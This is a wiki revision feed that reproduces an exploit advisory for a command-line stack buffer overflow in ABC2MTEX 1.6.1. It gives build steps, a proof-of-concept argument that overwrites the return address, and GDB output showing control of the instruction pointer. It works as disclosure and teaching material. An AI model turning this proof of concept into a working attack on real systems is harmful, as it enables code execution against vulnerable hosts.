https://pwnwiki.com/index.php?action=history&feed=atom&title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E 2026-04-11T08:39:56Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=2005&oldid=prev 2021-05-02T04:24:52Z

<p>Created page with &quot;==EXP== &lt;pre&gt; Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann &lt;yagemann@gatech.edu&gt; Vendor Homepage: https://abcno...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow<br /> Date: 2019-08-13<br /> Exploit Author: Carter Yagemann &lt;yagemann@gatech.edu&gt;<br /> Vendor Homepage: https://abcnotation.com/abc2mtex/<br /> Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz<br /> Version: 1.6.1<br /> Tested on: Debian Buster<br /> <br /> An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return<br /> address from the openIn function by providing a long input filename. This<br /> carries similar risk to CVE-2004-1257.<br /> <br /> Setup:<br /> <br /> $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz<br /> $ tar -xzf abc2mtex1.6.1.tar.gz<br /> $ make<br /> <br /> $ gcc --version<br /> gcc (Debian 8.3.0-6) 8.3.0<br /> Copyright (C) 2018 Free Software Foundation, Inc.<br /> This is free software; see the source for copying conditions. There is NO<br /> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.<br /> <br /> PoC:<br /> <br /> $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA<br /> <br /> GDB:<br /> <br /> We're going to place a breakpoint before and after abc.c:241 to show the overflow.<br /> <br /> $ gdb -q ./abc2mtex<br /> Reading symbols from ./abc2mtex...done.<br /> (gdb) break abc.c:241<br /> Breakpoint 1 at 0x4139: file abc.c, line 241.<br /> (gdb) break abc.c:242<br /> Breakpoint 2 at 0x414c: file abc.c, line 242.<br /> (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA<br /> Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA<br /> <br /> Breakpoint 1, openIn (filename=0x7fffffffe240 'A' &lt;repeats 120 times&gt;, &quot;FEDCBA&quot;) at abc.c:241<br /> 241 (void) strcpy(savename,filename);<br /> (gdb) bt<br /> #0 openIn (filename=0x7fffffffe240 'A' &lt;repeats 120 times&gt;, &quot;FEDCBA&quot;) at abc.c:241<br /> #1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273<br /> (gdb) c<br /> Continuing.<br /> <br /> Breakpoint 2, openIn (filename=0x7fffffffe240 'A' &lt;repeats 120 times&gt;, &quot;FEDCBA&quot;) at abc.c:242<br /> 242 (void) strcat(filename,&quot;.abc&quot;);<br /> (gdb) bt<br /> #0 openIn (filename=0x7fffffffe240 'A' &lt;repeats 120 times&gt;, &quot;FEDCBA&quot;) at abc.c:242<br /> #1 0x0000414243444546 in ?? ()<br /> #2 0x00007fffffffe4f8 in ?? ()<br /> #3 0x0000000200000000 in ?? ()<br /> #4 0x0000000000000000 in ?? ()<br /> (gdb) c<br /> Continuing.<br /> file &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA&quot; does not exist<br /> <br /> Program received signal SIGSEGV, Segmentation fault.<br /> 0x0000414243444546 in ?? ()<br /> (gdb) quit<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki